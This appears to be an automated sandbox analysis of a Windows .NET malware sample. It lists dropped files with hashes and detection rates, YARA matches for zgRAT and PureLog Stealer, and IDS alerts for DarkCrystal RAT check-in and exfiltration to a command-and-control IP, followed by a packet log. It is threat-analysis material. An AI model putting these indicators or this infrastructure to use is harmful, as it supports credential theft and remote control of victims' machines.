                                                                                                SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):32768
                                                                                                Entropy (8bit):5.645950918301459
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):23552
                                                                                                Entropy (8bit):5.529329139831718
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                                                                MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                                                                SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                                                                SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                                                                SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):9728
                                                                                                Entropy (8bit):5.0168086460579095
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:b2+4Af/qPl98sgn8VenjzRR0xXzhZ7BiCTUk9v2G6/7jK6XsBG7hWuP9LfqpW0RQ:gCU8XKb7BDUieGi3jcBgLyB+b
                                                                                                MD5:69546E20149FE5633BCBA413DC3DC964
                                                                                                SHA1:29FEB42AB8B563FAFACFD27FAE48D4019A4CBCC2
                                                                                                SHA-256:B48CA16B9BA2B44BF13051705B8E12D587D80262F57F7B2595AD1DD7854A86C6
                                                                                                SHA-512:90D5F6C334B8064ED6DD002B03C57CEBBFAC1620D6CB2B79103DB0369D3A4FD82DB092E675F387AB0BDFE20303D9AC37F4E150896FC333E6F83B00269F012236
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):69632
                                                                                                Entropy (8bit):5.932541123129161
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):85504
                                                                                                Entropy (8bit):5.8769270258874755
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):41472
                                                                                                Entropy (8bit):5.6808219961645605
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                                MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                                SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                                SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                                SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                Process:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):41472
                                                                                                Entropy (8bit):5.6808219961645605
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                                                                MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                                                                SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                                                                SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                                                                SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):24064
                                                                                                Entropy (8bit):5.492504448438552
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                                                                MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                                                                SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                                                                SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                                                                SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 46%
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):32768
                                                                                                Entropy (8bit):5.645950918301459
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                                                                MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                                                                SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                                                                SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                                                                SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 29%
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):24576
                                                                                                Entropy (8bit):5.535426842040921
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                                                                MD5:5420053AF2D273C456FB46C2CDD68F64
                                                                                                SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                                                                SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                                                                SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):69632
                                                                                                Entropy (8bit):5.932541123129161
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                Malicious:true
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 17%
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:ASCII text, with very long lines (521), with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):521
                                                                                                Entropy (8bit):5.891189885055267
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:K5X4bXkBYJ1n7P/N5PX3OB3f/TaTFYNejCf8SfSiiJfmVC/:K5IPJ1n7t5P83zaTUfxf/iJ/
                                                                                                MD5:008474D0073619C6BD8772ECB4C7537A
                                                                                                SHA1:2711BF81C4CE760C780BF63C3B3FA3E0F6B0A280
                                                                                                SHA-256:DD6B0EB99F7D1C89062E7314218C106A6294BC3F1ADD8F966FCFAA6EC4FB360A
                                                                                                SHA-512:E399DF4A79D9D2C3D6BBC567E92E1AB09242FE581A9AA05C0FF79258C016D627DEAC5857454B951DE8071C30FF6E8C63D70912245188D497B048DC45F011663A
                                                                                                Malicious:false
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):2335232
                                                                                                Entropy (8bit):7.648583005503961
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:Tn6/gWXBWpWdC3v2d73dJGNyx5w1vbwXPEM6B:Tn6oH4dC3udXxHw1vbOPEMs
                                                                                                MD5:670861D1059F9BAF2A8525097157D1C2
                                                                                                SHA1:F7007917499121CD5107697593A9429911AE0E77
                                                                                                SHA-256:D3CA1C9CDCF0F664F4C4B469CE935FEBB6D974693647CAA476557EEDB53F97C4
                                                                                                SHA-512:3B85B27162B6CD066BA1587271179C943EDC5BEDB1ED8EC96D3D3C13467B6B46A7A8809701BF0B7273CEFA34B3FE1248E138D1DE116987D689377CB88986EB4B
                                                                                                Malicious:true
                                                                                                Yara Hits:
                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\Downloads\smartscreen.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Downloads\smartscreen.exe, Author: Joe Security
                                                                                                Antivirus:
                                                                                                • Antivirus: ReversingLabs, Detection: 88%
                                                                                                Process:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):26
                                                                                                Entropy (8bit):3.95006375643621
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                Malicious:false
                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                File Type:JSON data
                                                                                                Category:dropped
                                                                                                Size (bytes):55
                                                                                                Entropy (8bit):4.306461250274409
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                Malicious:false
                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                Process:C:\Windows\System32\w32tm.exe
                                                                                                File Type:ASCII text
                                                                                                Category:dropped
                                                                                                Size (bytes):151
                                                                                                Entropy (8bit):4.852586823588612
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:VLV993J+miJWEoJ8FXbgjRFB0XXKNvoPIyXKvj:Vx993DEUvVFB0VNXs
                                                                                                MD5:4DD11E8CC612B7AF5FF5ED79CF33796E
                                                                                                SHA1:8C92DCB87555DD8FAB5AF797FCBF13BE5C5CAFD8
                                                                                                SHA-256:DDDEA2CE89AAD9EDCD10E39223E1DF14F0DD1649EB7FA2D9A2114025D0FADF50
                                                                                                SHA-512:6C37CB7E0D07527D5D0A5D45EF95F4F7B9688376F5681698135F2E46143CEBEE35AD4E489AEAE06527A2FEC321972FAA4AABB7BBBFF4FA985366F714B14FF510
                                                                                                Malicious:false
                                                                                                Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 11/10/2024 15:38:16..15:38:16, error: 0x80072746.15:38:21, error: 0x80072746.
                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Entropy (8bit):7.648583005503961
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                File name:d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                File size:2'335'232 bytes
                                                                                                MD5:670861d1059f9baf2a8525097157d1c2
                                                                                                SHA1:f7007917499121cd5107697593a9429911ae0e77
                                                                                                SHA256:d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647caa476557eedb53f97c4
                                                                                                SHA512:3b85b27162b6cd066ba1587271179c943edc5bedb1ed8ec96d3d3c13467b6b46a7a8809701bf0b7273cefa34b3fe1248e138d1de116987d689377cb88986eb4b
                                                                                                SSDEEP:49152:Tn6/gWXBWpWdC3v2d73dJGNyx5w1vbwXPEM6B:Tn6oH4dC3udXxHw1vbOPEMs
                                                                                                TLSH:0AB5CF0A95A34E33D2A5BF7988AB043D52B0C6637512EF1B364F90D1A9073349E372F6
                                                                                                Icon Hash:00928e8e8686b000
                                                                                                Entrypoint:0x63b9be
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:false
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                Time Stamp:0x6507AC75 [Mon Sep 18 01:48:37 2023 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                Instruction
                                                                                                jmp dword ptr [00402000h]
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
                                                                                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x23b970 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x23c000 | 0x370 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x23e000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x2399c4 | 0x239a00 | 7b62c0016612ac7b66b29de094e2a6ab | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x23c000 | 0x370 | 0x400 | dc6e9d038b87adeb17d7106e2f652653 | False | 0.3779296875 | data | 2.867353130536527 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc | 0x23e000 | 0xc | 0x200 | 373b0635dc862852f3697fadc8e0f428 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x23c058 | 0x318 | data | | | 0.44823232323232326
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-11T20:37:12.962571+0200 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49705 | 34.117.59.81 | 443 | TCP
2024-10-11T20:37:35.009718+0200 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.5 | 49798 | 5.42.66.51 | 80 | TCP
2024-10-11T20:37:49.364405+0200 | 2048130 | ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST) | 1 | 192.168.2.5 | 49896 | 5.42.66.51 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                Oct 11, 2024 20:37:44.429600000 CEST4985280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:44.430316925 CEST4986480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:44.435010910 CEST80498525.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:44.435147047 CEST4985280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:44.435208082 CEST80498645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:44.435272932 CEST4986480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:44.435651064 CEST4986480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:44.440474033 CEST80498645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:44.795135975 CEST4986480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:44.800460100 CEST80498645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:44.800913095 CEST80498645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:46.656552076 CEST4987980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:46.661489010 CEST80498795.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:46.661561966 CEST4987980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:46.661664963 CEST4987980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:46.666487932 CEST80498795.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:46.702755928 CEST4986480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:46.752327919 CEST80498645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:47.015513897 CEST4987980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:47.020575047 CEST80498795.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:47.020586014 CEST80498795.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:47.020595074 CEST80498795.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:47.361632109 CEST80498795.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:47.435548067 CEST4987980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:47.500583887 CEST80498795.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:47.544895887 CEST4987980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:47.654146910 CEST4987980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:47.654871941 CEST4988480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:47.659599066 CEST80498795.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:47.659666061 CEST4987980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:47.660278082 CEST80498845.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:47.660331964 CEST4988480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:47.660424948 CEST4988480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:47.665771008 CEST80498845.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:47.855566025 CEST4988680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:47.860405922 CEST80498865.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:47.861673117 CEST4988680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:47.862186909 CEST4988680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:47.867006063 CEST80498865.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:47.936352968 CEST80498645.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:47.936409950 CEST4986480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.019743919 CEST4988480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.025084972 CEST80498845.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:48.025105000 CEST80498845.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:48.025122881 CEST80498845.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:48.216985941 CEST4988680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.221824884 CEST80498865.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:48.221914053 CEST80498865.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:48.372127056 CEST80498845.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:48.451143026 CEST4988480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.509737968 CEST80498845.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:48.543601990 CEST80498865.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:48.638654947 CEST4988480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.638699055 CEST4988680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.670655012 CEST80498865.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:48.747997046 CEST4988680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.931586981 CEST4988480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.931770086 CEST4988680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.932434082 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.937486887 CEST80498965.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:48.937553883 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.937841892 CEST4989680192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.938436985 CEST80498845.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:48.938502073 CEST4988480192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:37:48.938988924 CEST80498865.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:37:48.939043999 CEST4988680192.168.2.55.42.66.51
